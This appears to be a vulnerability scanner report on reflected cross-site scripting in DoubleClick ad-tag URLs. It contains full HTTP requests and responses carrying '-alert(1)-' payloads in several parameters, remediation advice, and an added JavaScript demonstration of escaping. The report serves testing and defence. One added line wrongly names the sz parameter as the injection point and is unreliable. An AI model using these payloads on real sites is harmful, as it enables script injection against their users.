GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=lb4c51'-alert(1)-'a046432a509&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7891
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:08:53 GMT
Expires: Thu, 03 Feb 2011 16:08:53 GMT
Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... k\" href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/23c/%2a/k%3B234019457%3B1-0%3B0%3B57865897%3B2321-160/600%3B40155604/40173391/4%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=lb4c51'-alert(1)-'a046432a509&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2Nt ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95ce4"-alert(1)-"4bb60c57e4a was submitted in the sz parameter (the scanner appends its payload to the end of the parameter's value, which is why it appears immediately after aclk?sa=l in the request below). This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that the response is served as application/x-javascript rather than as HTML: a browser that navigates to the URL directly will normally display it as text, so the injected code executes in the origin of whichever page includes the URL as a script. The practical exposure is therefore to publisher pages that build these ad-tag URLs from attacker-influenced data (and to older browsers that sniff the response as HTML), rather than to a user who merely follows the link.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the data must be escaped for the JavaScript string context at the point of output: encode every character outside [A-Za-z0-9] as \xHH or \uHHHH, so that quotes, backslashes and line terminators cannot end the string literal and the sequences </script> and <!-- cannot end the enclosing script block. HTML entity encoding alone does not help here, because the value is parsed as JavaScript, not as HTML.
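The following is an added example, not DoubleClick's code, showing why a "-alert(1)-" payload of the kind submitted above executes when it is concatenated into a double-quoted JavaScript string, and how escaping for the string context stops it. The generated `var url = "..."` line and the `client` parameter name are simplified stand-ins for the `var url = escape("...")` line visible in the responses; the `alert` stub and `new Function` wrapper exist only so the script can be run under Node.js and the outcome observed.

```javascript
// Added example, not DoubleClick's code: how a "-alert(1)-" payload breaks out
// of a double-quoted JavaScript string literal, and how context-aware escaping
// at the point of output stops it. The script line and parameter name are
// simplified stand-ins for the `var url = escape("...")` line in the report.

// Vulnerable pattern: request data concatenated straight into JavaScript source.
function renderClickScriptVulnerable(clientParam) {
  return 'var url = "http://googleads.g.doubleclick.net/aclk?client=' +
         clientParam + '";';
}

// Escape a value for use inside a JavaScript string literal. Only [A-Za-z0-9]
// pass through; everything else becomes \xHH (or \uHHHH above U+00FF). This
// neutralises quotes and backslashes, line terminators (including U+2028 and
// U+2029), and the characters of `</script>` and `<!--`, which matter because
// the script is itself written into an HTML document. HTML entity encoding
// would not help: the value is parsed as JavaScript, never as HTML.
function escapeForJsString(value) {
  return String(value).replace(/[^A-Za-z0-9]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// Hardened pattern: same script, value escaped for the string context.
function renderClickScriptSafe(clientParam) {
  return 'var url = "http://googleads.g.doubleclick.net/aclk?client=' +
         escapeForJsString(clientParam) + '";';
}

// Execute a generated script with a stub alert() so we can observe whether the
// payload ran. Returns { alerts: <number of alert() calls>, url: <value of url> }.
// new Function is used only to demonstrate execution; it is not a sandbox.
function runScript(source) {
  let alerts = 0;
  const alert = () => { alerts += 1; };
  let url = null;
  try {
    url = new Function('alert', source + '\nreturn url;')(alert);
  } catch (err) {
    url = null; // syntax or runtime error: nothing sensible was assigned
  }
  return { alerts, url };
}

// Constructed input with the same shape as the payload the scanner submitted.
const samplePayload = '95ce4"-alert(1)-"4bb60c57e4a';

console.log(runScript(renderClickScriptVulnerable(samplePayload)));
// -> { alerts: 1, url: NaN }   ("..." - alert(1) - "..." is string arithmetic)
console.log(runScript(renderClickScriptSafe(samplePayload)));
// -> { alerts: 0, url: 'http://googleads.g.doubleclick.net/aclk?client=95ce4"-alert(1)-"4bb60c57e4a' }
```

The vulnerable output is syntactically valid JavaScript because the payload uses `-` to join the two halves of the broken string, which is exactly why the scanner chooses that form: the script keeps running, the `alert` fires, and `url` silently becomes NaN. The same escaping function covers the single-quoted variants reported below (the `'-alert(1)-'` payloads), since the single quote is also outside [A-Za-z0-9].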
Request
GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l95ce4"-alert(1)-"4bb60c57e4a&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 7891 Cache-Control: no-cache Pragma: no-cache Date: Thu, 03 Feb 2011 16:08:53 GMT Expires: Thu, 03 Feb 2011 16:08:53 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/23c/%2a/k%3B234019457%3B1-0%3B0%3B57865897%3B2321-160/600%3B40155604/40173391/4%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l95ce4"-alert(1)-"4bb60c57e4a&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2Nt ...[SNIP]...
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d464"-alert(1)-"0d57c46e691 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=9d464"-alert(1)-"0d57c46e691 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 7515 Cache-Control: no-cache Pragma: no-cache Date: Thu, 03 Feb 2011 16:06:25 GMT Expires: Thu, 03 Feb 2011 16:06:25 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:27:23 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... D0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=9d464"-alert(1)-"0d57c46e691https://www.ally.com/bank/interest-checking-account/index.html?CP=57865904;40155598"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess ...[SNIP]...
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3e8b'-alert(1)-'ba15f59f95e was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=c3e8b'-alert(1)-'ba15f59f95e HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 7481 Cache-Control: no-cache Pragma: no-cache Date: Thu, 03 Feb 2011 16:06:29 GMT Expires: Thu, 03 Feb 2011 16:06:29 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:39:48 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... D0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=c3e8b'-alert(1)-'ba15f59f95ehttps://www.ally.com/bank/interest-checking-account/index.html?CP=57865904;39213496\"> ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de8ab'-alert(1)-'2e90ecc46ed was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAEde8ab'-alert(1)-'2e90ecc46ed&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=;ord=1257048341? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 03 Feb 2011 16:04:49 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7517
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:39:48 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... UwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAEde8ab'-alert(1)-'2e90ecc46ed&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865904%3B39213496\"> ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62261"-alert(1)-"0f904a05a8a was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE62261"-alert(1)-"0f904a05a8a&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=;ord=1257048341? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 03 Feb 2011 16:04:45 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7551
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:27:23 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... UwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE62261"-alert(1)-"0f904a05a8a&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865904%3B40155598"); var fscUrl = url; ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73cad'-alert(1)-'9a787db18eb was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-410367935223407373cad'-alert(1)-'9a787db18eb&adurl=;ord=1257048341? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 03 Feb 2011 16:06:04 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7551
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:27:23 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-410367935223407373cad'-alert(1)-'9a787db18eb&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865904%3B40155598\"> ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97bde"-alert(1)-"10744de2739 was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-410367935223407397bde"-alert(1)-"10744de2739&adurl=;ord=1257048341? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 03 Feb 2011 16:06:00 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7517
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:39:48 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-410367935223407397bde"-alert(1)-"10744de2739&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865904%3B39213496"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1b11"-alert(1)-"fc5636c00ac was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1c1b11"-alert(1)-"fc5636c00ac&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=;ord=1257048341? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 03 Feb 2011 16:05:05 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7517
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:39:48 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... yAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1c1b11"-alert(1)-"fc5636c00ac&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865904%3B39213496"); var fscUrl = url; var f ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ccfa'-alert(1)-'eb4e71ababd was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
